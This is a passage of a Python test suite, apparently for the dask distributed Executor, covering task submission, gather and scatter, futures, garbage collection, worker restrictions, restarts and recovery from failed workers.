f = gen.Future()
def wait_on_results():
f.set_result(list(results))
t = Thread(target=wait_on_results)
t.daemon = True
t.start()
result_list = yield f
# getting map results blocks
assert result_list == list(map(inc, range(5)))
yield e._shutdown()
@gen_cluster(executor=True)
def test_future(e, s, a, b):
x = e.submit(inc, 10)
assert str(x.key) in repr(x)
assert str(x.status) in repr(x)
@gen_cluster(executor=True)
def test_Future_exception(e, s, a, b):
x = e.submit(div, 1, 0)
result = yield x._exception()
assert isinstance(result, ZeroDivisionError)
x = e.submit(div, 1, 1)
result = yield x._exception()
assert result is None
def test_Future_exception_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(div, 1, 0)
assert isinstance(x.exception(), ZeroDivisionError)
x = e.submit(div, 1, 1)
assert x.exception() is None
@gen_cluster(executor=True)
def test_map_naming(e, s, a, b):
L1 = e.map(inc, range(5))
L2 = e.map(inc, range(5))
assert [x.key for x in L1] == [x.key for x in L2]
L3 = e.map(inc, [1, 1, 1, 1])
assert len({x.event for x in L3}) == 1
L4 = e.map(inc, [1, 1, 1, 1], pure=False)
assert len({x.event for x in L4}) == 4
@gen_cluster(executor=True)
def test_submit_naming(e, s, a, b):
a = e.submit(inc, 1)
b = e.submit(inc, 1)
assert a.event is b.event
c = e.submit(inc, 1, pure=False)
assert c.key != a.key
@gen_cluster(executor=True)
def test_exceptions(e, s, a, b):
x = e.submit(div, 1, 2)
result = yield x._result()
assert result == 1 / 2
x = e.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
result = yield x._result()
x = e.submit(div, 10, 2) # continues to operate
result = yield x._result()
assert result == 10 / 2
@gen_cluster()
def test_gc(s, a, b):
e = Executor((s.ip, s.port), start=False)
yield e._start()
x = e.submit(inc, 10)
yield x._result()
assert s.who_has[x.key]
x.__del__()
yield e._shutdown()
assert not s.who_has[x.key]
def test_thread(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(inc, 1)
assert x.result() == 2
def test_sync_exceptions(loop):
with cluster() as (s, [a, b]):
e = Executor(('127.0.0.1', s['port']), loop=loop)
x = e.submit(div, 10, 2)
assert x.result() == 5
y = e.submit(div, 10, 0)
try:
y.result()
assert False
except ZeroDivisionError:
pass
z = e.submit(div, 10, 5)
assert z.result() == 2
e.shutdown()
@gen_cluster(executor=True)
def test_stress_1(e, s, a, b):
n = 2**6
seq = e.map(inc, range(n))
while len(seq) > 1:
yield gen.sleep(0.1)
seq = [e.submit(add, seq[i], seq[i + 1])
for i in range(0, len(seq), 2)]
result = yield seq[0]._result()
assert result == sum(map(inc, range(n)))
@gen_cluster(executor=True)
def test_gather(e, s, a, b):
x = e.submit(inc, 10)
y = e.submit(inc, x)
result = yield e._gather(x)
assert result == 11
result = yield e._gather([x])
assert result == [11]
result = yield e._gather({'x': x, 'y': [y]})
assert result == {'x': 11, 'y': [12]}
def test_gather_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(inc, 1)
assert e.gather(x) == 2
y = e.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
e.gather([x, y])
[xx] = e.gather([x, y], errors='skip')
assert xx == 2
@gen_cluster(executor=True)
def test_gather_strict(e, s, a, b):
x = e.submit(div, 2, 1)
y = e.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
yield e._gather([x, y])
[xx] = yield e._gather([x, y], errors='skip')
assert xx == 2
@gen_cluster(executor=True)
def test_get(e, s, a, b):
result = yield e._get({'x': (inc, 1)}, 'x')
assert result == 2
result = yield e._get({'x': (inc, 1)}, ['x'])
assert result == [2]
result = yield e._get({}, [])
assert result == []
result = yield e._get({('x', 1): (inc, 1), ('x', 2): (inc, ('x', 1))},
('x', 2))
assert result == 3
def test_get_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
assert e.get({'x': (inc, 1)}, 'x') == 2
def test_get_sync_optimize_graph_passes_through(loop):
import dask.bag as db
import dask
bag = db.range(10, npartitions=3).map(inc)
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
dask.compute(bag.sum(), optimize_graph=False, get=e.get)
def test_submit_errors(loop):
def f(a, b, c):
pass
e = Executor('127.0.0.1:8787', start=False, loop=loop)
with pytest.raises(TypeError):
e.submit(1, 2, 3)
with pytest.raises(TypeError):
e.map([1, 2, 3])
@gen_cluster(executor=True)
def test_wait(e, s, a, b):
a = e.submit(inc, 1)
b = e.submit(inc, 1)
c = e.submit(inc, 2)
done, not_done = yield _wait([a, b, c])
assert done == {a, b, c}
assert not_done == set()
assert a.status == b.status == 'finished'
@gen_cluster(executor=True)
def test__as_completed(e, s, a, b):
a = e.submit(inc, 1)
b = e.submit(inc, 1)
c = e.submit(inc, 2)
from distributed.compatibility import Queue
queue = Queue()
yield _as_completed([a, b, c], queue)
assert queue.qsize() == 3
assert {queue.get(), queue.get(), queue.get()} == {a, b, c}
result = yield _first_completed([a, b, c])
assert result in [a, b, c]
def test_as_completed(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(inc, 1)
y = e.submit(inc, 2)
z = e.submit(inc, 1)
seq = as_completed([x, y, z])
assert isinstance(seq, Iterator)
assert set(seq) == {x, y, z}
def test_wait_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(inc, 1)
y = e.submit(inc, 2)
done, not_done = wait([x, y])
assert done == {x, y}
assert not_done == set()
assert x.status == y.status == 'finished'
@gen_cluster(executor=True)
def test_garbage_collection(e, s, a, b):
a = e.submit(inc, 1)
b = e.submit(inc, 1)
assert e.refcount[a.key] == 2
a.__del__()
assert e.refcount[a.key] == 1
c = e.submit(inc, b)
b.__del__()
result = yield c._result()
assert result == 3
bkey = b.key
b.__del__()
assert bkey not in e.futures
@gen_cluster(executor=True)
def test_garbage_collection_with_scatter(e, s, a, b):
[a] = yield e._scatter([1])
assert a.key in e.futures
assert a.status == 'finished'
assert a.event.is_set()
assert s.who_wants[a.key] == {e.id}
assert e.refcount[a.key] == 1
a.__del__()
assert e.refcount[a.key] == 0
start = time()
while True:
if a.key not in s.who_has:
break
else:
assert time() < start + 3
yield gen.sleep(0.1)
@gen_cluster(timeout=1000, executor=True)
def test_recompute_released_key(e, s, a, b):
x = e.submit(inc, 100)
result1 = yield x._result()
xkey = x.key
del x
import gc; gc.collect()
assert e.refcount[xkey] == 0
# 1 second batching needs a second action to trigger
while xkey in s.who_has or xkey in a.data or xkey in b.data:
yield gen.sleep(0.1)
x = e.submit(inc, 100)
assert x.key in e.futures
result2 = yield x._result()
assert result1 == result2
@pytest.mark.parametrize(('func', 'n'), [(slowinc, 100), (inc, 1000)])
def test_stress_gc(loop, func, n):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(func, 1)
for i in range(n):
x = e.submit(func, x)
assert x.result() == n + 2
@slow
@gen_cluster(executor=True)
def test_long_tasks_dont_trigger_timeout(e, s, a, b):
from time import sleep
x = e.submit(sleep, 3)
yield x._result()
@gen_cluster(executor=True)
def test_missing_data_heals(e, s, a, b):
x = e.submit(inc, 1)
y = e.submit(inc, x)
z = e.submit(inc, y)
yield _wait([x, y, z])
# Secretly delete y's key
if y.key in a.data:
del a.data[y.key]
if y.key in b.data:
del b.data[y.key]
w = e.submit(add, y, z)
result = yield w._result()
assert result == 3 + 4
@slow
@gen_cluster()
def test_missing_worker(s, a, b):
bad = 'bad-host:8788'
s.ncores[bad] = 4
s.who_has['b'] = {bad}
s.has_what[bad] = {'b'}
e = Executor((s.ip, s.port), start=False)
yield e._start()
dsk = {'a': 1, 'b': (inc, 'a'), 'c': (inc, 'b')}
result = yield e._get(dsk, 'c')
assert result == 3
assert bad not in s.ncores
yield e._shutdown()
@gen_cluster(executor=True)
def test_gather_robust_to_missing_data(e, s, a, b):
x, y, z = e.map(inc, range(3))
yield _wait([x, y, z]) # everything computed
for q in [x, y]:
if q.key in a.data:
del a.data[q.key]
if q.key in b.data:
del b.data[q.key]
xx, yy, zz = yield e._gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@gen_cluster(executor=True)
def test_gather_robust_to_nested_missing_data(e, s, a, b):
w = e.submit(inc, 1)
x = e.submit(inc, w)
y = e.submit(inc, x)
z = e.submit(inc, y)
yield _wait([z])
for worker in [a, b]:
for datum in [y, z]:
if datum.key in worker.data:
del worker.data[datum.key]
result = yield e._gather([z])
assert result == [inc(inc(inc(inc(1))))]
@gen_cluster(executor=True)
def test_tokenize_on_futures(e, s, a, b):
x = e.submit(inc, 1)
y = e.submit(inc, 1)
tok = tokenize(x)
assert tokenize(x) == tokenize(x)
assert tokenize(x) == tokenize(y)
e.futures[x.key]['status'] = 'finished'
assert tok == tokenize(y)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)], executor=True)
def test_restrictions_submit(e, s, a, b):
x = e.submit(inc, 1, workers={a.ip})
y = e.submit(inc, x, workers={b.ip})
yield _wait([x, y])
assert s.restrictions[x.key] == {a.ip}
assert x.key in a.data
assert s.restrictions[y.key] == {b.ip}
assert y.key in b.data
@gen_cluster(executor=True)
def test_restrictions_ip_port(e, s, a, b):
x = e.submit(inc, 1, workers={a.address})
y = e.submit(inc, x, workers={b.address})
yield _wait([x, y])
assert s.restrictions[x.key] == {a.address}
assert x.key in a.data
assert s.restrictions[y.key] == {b.address}
assert y.key in b.data
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)], executor=True)
def test_restrictions_map(e, s, a, b):
L = e.map(inc, range(5), workers={a.ip})
yield _wait(L)
assert set(a.data) == {x.key for x in L}
assert not b.data
for x in L:
assert s.restrictions[x.key] == {a.ip}
L = e.map(inc, [10, 11, 12], workers=[{a.ip},
{a.ip, b.ip},
{b.ip}])
yield _wait(L)
assert s.restrictions[L[0].key] == {a.ip}
assert s.restrictions[L[1].key] == {a.ip, b.ip}
assert s.restrictions[L[2].key] == {b.ip}
with pytest.raises(ValueError):
e.map(inc, [10, 11, 12], workers=[{a.ip}])
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)], executor=True)
def test_restrictions_get(e, s, a, b):
dsk = {'x': 1, 'y': (inc, 'x'), 'z': (inc, 'y')}
restrictions = {'y': {a.ip}, 'z': {b.ip}}
result = yield e._get(dsk, ['y', 'z'], restrictions)
assert result == [2, 3]
assert 'y' in a.data
assert 'z' in b.data
@gen_cluster(executor=True)
def dont_test_bad_restrictions_raise_exception(e, s, a, b):
z = e.submit(inc, 2, workers={'bad-address'})
try:
yield z._result()
assert False
except ValueError as e:
assert 'bad-address' in str(e)
assert z.key in str(e)
def test_submit_after_failed_worker(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
L = e.map(inc, range(10))
wait(L)
a['proc'].terminate()
total = e.submit(sum, L)
assert total.result() == sum(map(inc, range(10)))
def test_gather_after_failed_worker(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
L = e.map(inc, range(10))
wait(L)
a['proc'].terminate()
result = e.gather(L)
assert result == list(map(inc, range(10)))
@slow
def test_gather_then_submit_after_failed_workers(loop):
with cluster(nworkers=4) as (s, [w, x, y, z]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
L = e.map(inc, range(20))
wait(L)
w['proc'].terminate()
total = e.submit(sum, L)
wait([total])
(_, port) = first(e.scheduler.who_has[total.key])
for d in [x, y, z]:
if d['port'] == port:
d['proc'].terminate()
result = e.gather([total])
assert result == [sum(map(inc, range(20)))]
@gen_cluster(ncores=[('127.0.0.1', 1)], executor=True)
def test_errors_dont_block(e, s, w):
L = [e.submit(inc, 1),
e.submit(throws, 1),
e.submit(inc, 2),
e.submit(throws, 2)]
start = time()
while not (L[0].status == L[2].status == 'finished'):
assert time() < start + 5
yield gen.sleep(0.01)
result = yield e._gather([L[0], L[2]])
assert result == [2, 3]
@gen_cluster(executor=True)
def test_submit_quotes(e, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
x = e.submit(assert_list, [1, 2, 3])
result = yield x._result()
assert result
x = e.submit(assert_list, [1, 2, 3], z=[4, 5, 6])
result = yield x._result()
assert result
x = e.submit(inc, 1)
y = e.submit(inc, 2)
z = e.submit(assert_list, [x, y])
result = yield z._result()
assert result
@gen_cluster(executor=True)
def test_map_quotes(e, s, a, b):
def assert_list(x, z=[]):
return isinstance(x, list) and isinstance(z, list)
L = e.map(assert_list, [[1, 2, 3], [4]])
result = yield e._gather(L)
assert all(result)
L = e.map(assert_list, [[1, 2, 3], [4]], z=[10])
result = yield e._gather(L)
assert all(result)
L = e.map(assert_list, [[1, 2, 3], [4]], [[]] * 3)
result = yield e._gather(L)
assert all(result)
@gen_cluster()
def test_two_consecutive_executors_share_results(s, a, b):
from random import randint
e = Executor((s.ip, s.port), start=False)
yield e._start()
x = e.submit(randint, 0, 1000, pure=True)
xx = yield x._result()
f = Executor((s.ip, s.port), start=False)
yield f._start()
y = f.submit(randint, 0, 1000, pure=True)
yy = yield y._result()
assert xx == yy
yield e._shutdown()
yield f._shutdown()
@gen_cluster(executor=True)
def test_submit_then_get_with_Future(e, s, a, b):
x = e.submit(slowinc, 1)
dsk = {'y': (inc, x)}
result = yield e._get(dsk, 'y')
assert result == 3
@gen_cluster(executor=True)
def test_aliases(e, s, a, b):
x = e.submit(inc, 1)
dsk = {'y': x}
result = yield e._get(dsk, 'y')
assert result == 2
@gen_cluster(executor=True)
def test__scatter(e, s, a, b):
d = yield e._scatter({'y': 20})
assert isinstance(d['y'], Future)
assert a.data.get('y') == 20 or b.data.get('y') == 20
assert (a.address in s.who_has['y'] or
b.address in s.who_has['y'])
assert s.who_has['y']
assert s.nbytes == {'y': sizeof(20)}
yy = yield e._gather([d['y']])
assert yy == [20]
[x] = yield e._scatter([10])
assert isinstance(x, Future)
assert a.data.get(x.key) == 10 or b.data.get(x.key) == 10
xx = yield e._gather([x])
assert s.who_has[x.key]
assert (a.address in s.who_has[x.key] or
b.address in s.who_has[x.key])
assert s.nbytes == {'y': sizeof(20), x.key: sizeof(10)}
assert xx == [10]
z = e.submit(add, x, d['y']) # submit works on Future
result = yield z._result()
assert result == 10 + 20
result = yield e._gather([z, x])
assert result == [30, 10]
@gen_cluster(executor=True)
def test__scatter_types(e, s, a, b):
d = yield e._scatter({'x': 1})
assert isinstance(d, dict)
assert list(d) == ['x']
for seq in [[1], (1,), {1}, frozenset([1])]:
L = yield e._scatter(seq)
assert isinstance(L, type(seq))
assert len(L) == 1
seq = yield e._scatter(range(5))
assert isinstance(seq, list)
assert len(seq) == 5
@gen_cluster(executor=True)
def test_scatter_hash(e, s, a, b):
[a] = yield e._scatter([1])
[b] = yield e._scatter([1])
assert a.key == b.key
@gen_cluster(executor=True)
def test_get_releases_data(e, s, a, b):
[x] = yield e._get({'x': (inc, 1)}, ['x'])
import gc; gc.collect()
assert e.refcount['x'] == 0
def test_global_executors(loop):
assert not _global_executor[0]
with pytest.raises(ValueError):
default_executor()
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
assert _global_executor == [e]
assert default_executor() is e
with Executor(('127.0.0.1', s['port']), loop=loop) as f:
assert _global_executor == [f]
assert default_executor() is f
assert default_executor(e) is e
assert default_executor(f) is f
assert not _global_executor[0]
@gen_cluster(executor=True)
def test_exception_on_exception(e, s, a, b):
x = e.submit(lambda: 1 / 0)
y = e.submit(inc, x)
with pytest.raises(ZeroDivisionError):
yield y._result()
z = e.submit(inc, y)
with pytest.raises(ZeroDivisionError):
yield z._result()
@gen_cluster(executor=True)
def test_nbytes(e, s, a, b):
[x] = yield e._scatter([1])
assert s.nbytes == {x.key: sizeof(1)}
y = e.submit(inc, x)
yield y._result()
assert s.nbytes == {x.key: sizeof(1),
y.key: sizeof(2)}
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)], executor=True)
def test_nbytes_determines_worker(e, s, a, b):
x = e.submit(identity, 1, workers=[a.ip])
y = e.submit(identity, tuple(range(100)), workers=[b.ip])
yield e._gather([x, y])
z = e.submit(lambda x, y: None, x, y)
yield z._result()
assert s.who_has[z.key] == {b.address}
@gen_cluster(executor=True)
def test_if_intermediates_clear_on_error(e, s, a, b):
x = delayed(div)(1, 0)
y = delayed(div)(1, 2)
z = delayed(add)(x, y)
f = e.compute(z)
with pytest.raises(ZeroDivisionError):
yield f._result()
s.validate()
assert not s.who_has
@gen_cluster(executor=True)
def test_pragmatic_move_small_data_to_large_data(e, s, a, b):
lists = e.map(lambda n: list(range(n)), [10] * 10, pure=False)
sums = e.map(sum, lists)
total = e.submit(sum, sums)
def f(x, y):
return None
results = e.map(f, lists, [total] * 10)
yield _wait([total])
yield _wait(results)
assert sum(s.who_has[l.key] == s.who_has[r.key]
for l, r in zip(lists, results)) >= 8
@gen_cluster(executor=True)
def test_get_with_non_list_key(e, s, a, b):
dsk = {('x', 0): (inc, 1), 5: (inc, 2)}
x = yield e._get(dsk, ('x', 0))
y = yield e._get(dsk, 5)
assert x == 2
assert y == 3
@gen_cluster(executor=True)
def test_get_with_error(e, s, a, b):
dsk = {'x': (div, 1, 0), 'y': (inc, 'x')}
with pytest.raises(ZeroDivisionError):
yield e._get(dsk, 'y')
def test_get_with_error_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
dsk = {'x': (div, 1, 0), 'y': (inc, 'x')}
with pytest.raises(ZeroDivisionError):
e.get(dsk, 'y')
@gen_cluster(executor=True)
def test_directed_scatter(e, s, a, b):
yield e._scatter([1, 2, 3], workers=[a.address])
assert len(a.data) == 3
assert not b.data
yield e._scatter([4, 5], workers=[b.name])
assert len(b.data) == 2
def test_directed_scatter_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
futures = e.scatter([1, 2, 3], workers=[('127.0.0.1', b['port'])])
has_what = sync(loop, e.scheduler.has_what)
assert len(has_what['127.0.0.1:%d' % b['port']]) == len(futures)
assert len(has_what['127.0.0.1:%d' % a['port']]) == 0
def test_iterator_scatter(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
aa = e.scatter([1,2,3])
assert [1,2,3] == e.gather(aa)
g = (i for i in range(10))
futures = e.scatter(g)
assert isinstance(futures, Iterator)
a = next(futures)
assert e.gather(a) == 0
futures = list(futures)
assert len(futures) == 9
assert e.gather(futures) == [1, 2, 3, 4, 5, 6, 7, 8, 9]
def test_queue_scatter(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as ee:
from distributed.compatibility import Queue
q = Queue()
for d in range(10):
q.put(d)
futures = ee.scatter(q)
assert isinstance(futures, Queue)
a = futures.get()
assert ee.gather(a) == 0
def test_queue_scatter_gather_maxsize(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
from distributed.compatibility import Queue
q = Queue(maxsize=3)
out = e.scatter(q, maxsize=10)
assert out.maxsize == 10
local = e.gather(q)
assert not local.maxsize
q = Queue()
out = e.scatter(q)
assert not out.maxsize
local = e.gather(out, maxsize=10)
assert local.maxsize == 10
q = Queue(maxsize=3)
out = e.scatter(q)
assert not out.maxsize
def test_queue_gather(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as ee:
from distributed.compatibility import Queue
q = Queue()
qin = list(range(10))
for d in qin:
q.put(d)
futures = ee.scatter(q)
assert isinstance(futures, Queue)
ff = ee.gather(futures)
assert isinstance(ff, Queue)
qout = []
for f in range(10):
qout.append(ff.get())
assert qout == qin
def test_iterator_gather(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as ee:
i_in = list(range(10))
g = (d for d in i_in)
futures = ee.scatter(g)
assert isinstance(futures, Iterator)
ff = ee.gather(futures)
assert isinstance(ff, Iterator)
i_out = list(ff)
assert i_out == i_in
i_in = ['a', 'b', 'c', StopIteration('f'), StopIteration, 'd', 'e']
g = (d for d in i_in)
futures = ee.scatter(g)
ff = ee.gather(futures)
i_out = list(ff)
assert i_out[:3] == i_in[:3]
# This is because StopIteration('f') != StopIteration('f')
assert isinstance(i_out[3], StopIteration)
assert i_out[3].args == i_in[3].args
assert i_out[4:] == i_in[4:]
@gen_cluster(executor=True)
def test_many_submits_spread_evenly(e, s, a, b):
L = [e.submit(inc, i) for i in range(10)]
yield _wait(L)
assert a.data and b.data
@gen_cluster(executor=True)
def test_traceback(e, s, a, b):
x = e.submit(div, 1, 0)
tb = yield x._traceback()
if sys.version_info[0] >= 3:
assert any('x / y' in line
for line in pluck(3, traceback.extract_tb(tb)))
@gen_cluster(executor=True)
def test_get_traceback(e, s, a, b):
try:
yield e._get({'x': (div, 1, 0)}, 'x')
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any('x / y' in line for line in L)
@gen_cluster(executor=True)
def test_gather_traceback(e, s, a, b):
x = e.submit(div, 1, 0)
try:
yield e._gather(x)
except ZeroDivisionError:
exc_type, exc_value, exc_traceback = sys.exc_info()
L = traceback.format_tb(exc_traceback)
assert any('x / y' in line for line in L)
def test_traceback_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(div, 1, 0)
tb = x.traceback()
if sys.version_info[0] >= 3:
assert any('x / y' in line
for line in concat(traceback.extract_tb(tb))
if isinstance(line, str))
y = e.submit(inc, x)
tb2 = y.traceback()
assert set(pluck(3, traceback.extract_tb(tb2))).issuperset(
set(pluck(3, traceback.extract_tb(tb))))
z = e.submit(div, 1, 2)
tb = z.traceback()
assert tb is None
@gen_cluster(Worker=Nanny, executor=True)
def test_restart(e, s, a, b):
assert s.ncores == {a.worker_address: 1, b.worker_address: 2}
x = e.submit(inc, 1)
y = e.submit(inc, x)
z = e.submit(div, 1, 0)
yield y._result()
assert set(s.who_has) == {x.key, y.key}
f = yield e._restart()
assert f is e
assert len(s.stacks) == 2
assert len(s.processing) == 2
assert not s.who_has
assert x.cancelled()
assert y.cancelled()
assert z.cancelled()
assert z.key not in s.exceptions
assert not s.who_wants
assert not s.wants_what
@gen_cluster(Worker=Nanny, executor=True)
def test_restart_cleared(e, s, a, b):
x = 2 * delayed(1) + 1
f = e.compute(x)
yield _wait([f])
assert s.released
yield e._restart()
for coll in [s.tasks, s.dependencies, s.dependents, s.waiting,
s.waiting_data, s.who_has, s.restrictions, s.loose_restrictions,
s.released, s.keyorder, s.exceptions, s.who_wants,
s.exceptions_blame]:
assert not coll
def test_restart_sync_no_center(loop):
with cluster(nanny=True) as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(inc, 1)
e.restart()
assert x.cancelled()
y = e.submit(inc, 2)
assert y.result() == 3
assert len(e.ncores()) == 2
def test_restart_sync(loop):
with cluster(nanny=True) as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(div, 1, 2)
x.result()
assert sync(loop, e.scheduler.who_has)
e.restart()
assert not sync(loop, e.scheduler.who_has)
assert x.cancelled()
assert len(e.ncores()) == 2
with pytest.raises(CancelledError):
x.result()
y = e.submit(div, 1, 3)
assert y.result() == 1 / 3
def test_restart_fast(loop):
with cluster(nanny=True) as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
L = e.map(sleep, range(10))
start = time()
e.restart()
assert time() - start < 5
assert len(e.ncores()) == 2
assert all(x.status == 'cancelled' for x in L)
x = e.submit(inc, 1)
assert x.result() == 2
@gen_cluster(Worker=Nanny, executor=True)
def test_fast_kill(e, s, a, b):
L = e.map(sleep, range(10))
start = time()
yield e._restart()
assert time() - start < 5
assert all(x.status == 'cancelled' for x in L)
x = e.submit(inc, 1)
result = yield x._result()
assert result == 2
@gen_cluster(executor=True)
def test_upload_file(e, s, a, b):
def g():
import myfile
return myfile.f()
with tmp_text('myfile.py', 'def f():\n return 123') as fn:
yield e._upload_file(fn)
sleep(1) # TODO: why is this necessary?
x = e.submit(g, pure=False)
result = yield x._result()
assert result == 123
with tmp_text('myfile.py', 'def f():\n return 456') as fn:
yield e._upload_file(fn)
y = e.submit(g, pure=False)
result = yield y._result()
assert result == 456
def test_upload_file_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
def g():
import myfile
return myfile.x
with tmp_text('myfile.py', 'x = 123') as fn:
e.upload_file(fn)
x = e.submit(g)
assert x.result() == 123
@gen_cluster(executor=True)
def test_upload_file_exception(e, s, a, b):
with tmp_text('myfile.py', 'syntax-error!') as fn:
with pytest.raises(SyntaxError):
yield e._upload_file(fn)
def test_upload_file_exception_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
with tmp_text('myfile.py', 'syntax-error!') as fn:
with pytest.raises(SyntaxError):
e.upload_file(fn)
@pytest.mark.xfail
@gen_cluster()
def test_multiple_executors(s, a, b):
a = Executor((s.ip, s.port), start=False)
yield a._start()
b = Executor((s.ip, s.port), start=False)
yield b._start()
x = a.submit(inc, 1)
y = b.submit(inc, 2)
assert x.executor is a
assert y.executor is b
xx = yield x._result()
yy = yield y._result()
assert xx == 2
assert yy == 3
z = a.submit(add, x, y)
assert z.executor is a
zz = yield z._result()
assert zz == 5
yield a._shutdown()
yield b._shutdown()
@gen_cluster(Worker=Nanny)
def test_multiple_executors_restart(s, a, b):
e1 = Executor((s.ip, s.port), start=False)
yield e1._start()
e2 = Executor((s.ip, s.port), start=False)
yield e2._start()
x = e1.submit(inc, 1)
y = e2.submit(inc, 2)
xx = yield x._result()
yy = yield y._result()
assert xx == 2
assert yy == 3
yield e1._restart()
assert x.cancelled()
assert y.cancelled()
yield e1._shutdown(fast=True)
yield e2._shutdown(fast=True)
@gen_cluster(executor=True)
def test_async_compute(e, s, a, b):
from dask.delayed import delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
[yy, zz, aa] = e.compute([y, z, 3], sync=False)
assert isinstance(yy, Future)
assert isinstance(zz, Future)
assert aa == 3
result = yield e._gather([yy, zz])
assert result == [2, 0]
assert isinstance(e.compute(y), Future)
assert isinstance(e.compute([y]), (tuple, list))
@gen_cluster(executor=True)
def test_async_compute_with_scatter(e, s, a, b):
d = yield e._scatter({('x', 1): 1, ('y', 1): 2})
x, y = d[('x', 1)], d[('y', 1)]
from dask.delayed import delayed
z = delayed(add)(delayed(inc)(x), delayed(inc)(y))
zz = e.compute(z)
[result] = yield e._gather([zz])
assert result == 2 + 3
def test_sync_compute(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
yy, zz = e.compute([y, z], sync=True)
assert (yy, zz) == (2, 0)
@gen_cluster(executor=True)
def test_remote_scatter_gather(e, s, a, b):
x, y, z = yield e._scatter([1, 2, 3])
assert x.key in a.data or x.key in b.data
assert y.key in a.data or y.key in b.data
assert z.key in a.data or z.key in b.data
xx, yy, zz = yield e._gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@gen_cluster(timeout=1000, executor=True)
def test_remote_submit_on_Future(e, s, a, b):
x = e.submit(lambda x: x + 1, 1)
y = e.submit(lambda x: x + 1, x)
result = yield y._result()
assert result == 3
def test_start_is_idempotent(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
e.start()
e.start()
e.start()
x = e.submit(inc, 1)
assert x.result() == 2
@gen_cluster(executor=True)
def test_executor_with_scheduler(e, s, a, b):
assert s.ncores == {a.address: a.ncores, b.address: b.ncores}
x = e.submit(inc, 1)
y = e.submit(inc, 2)
z = e.submit(add, x, y)
result = yield x._result()
assert result == 1 + 1
result = yield z._result()
assert result == 1 + 1 + 1 + 2
a, b, c = yield e._scatter([1, 2, 3])
aa, bb, xx = yield e._gather([a, b, x])
assert (aa, bb, xx) == (1, 2, 2)
result = yield e._get({'x': (inc, 1), 'y': (add, 'x', 10)}, 'y')
assert result == 12
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([('127.0.0.1', 1), ('127.0.0.2', 2)], executor=True)
def test_allow_restrictions(e, s, a, b):
x = e.submit(inc, 1, workers=a.ip)
yield x._result()
assert s.who_has[x.key] == {a.address}
assert not s.loose_restrictions
x = e.submit(inc, 2, workers=a.ip, allow_other_workers=True)
yield x._result()
assert s.who_has[x.key] == {a.address}
assert x.key in s.loose_restrictions
L = e.map(inc, range(3, 13), workers=a.ip, allow_other_workers=True)
yield _wait(L)
assert all(s.who_has[f.key] == {a.address} for f in L)
assert {f.key for f in L}.issubset(s.loose_restrictions)
"""
x = e.submit(inc, 14, workers='127.0.0.3')
with ignoring(gen.TimeoutError):
yield gen.with_timeout(timedelta(seconds=0.1), x._result())
assert False
assert not s.who_has[x.key]
assert x.key not in s.loose_restrictions
"""
